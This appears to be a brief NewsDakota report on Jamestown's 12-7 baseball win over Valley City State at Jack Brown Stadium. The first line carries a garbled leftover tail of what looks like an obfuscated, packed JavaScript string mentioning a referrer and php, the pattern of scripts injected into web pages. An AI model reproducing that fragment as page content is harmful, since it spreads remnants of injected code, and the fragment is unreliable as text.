JAMESTOWN iyahy|var|u0026u|referrer|sensy||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – It certainly felt like the first day of fall at Jack Brown Stadium last night as the Jimmie baseball team welcomed in Valley City State for a nine-inning game. Jamestown came away with a 12-7 win and their third win of the 2015-16 season.

Jimmie catcher Quinn Irey drove in five runs on the back of his three-run homer 10 days ago against Mayville State. Jamestown used six different pitchers in the game.

VCSU jumped out to a 2-0 lead on Cody Kingsbury’s two-run homer in the first innings, but Jamestown scored five immediately and didn’t relinquish the lead.

Jamestown will host Winnipeg on Sunday.
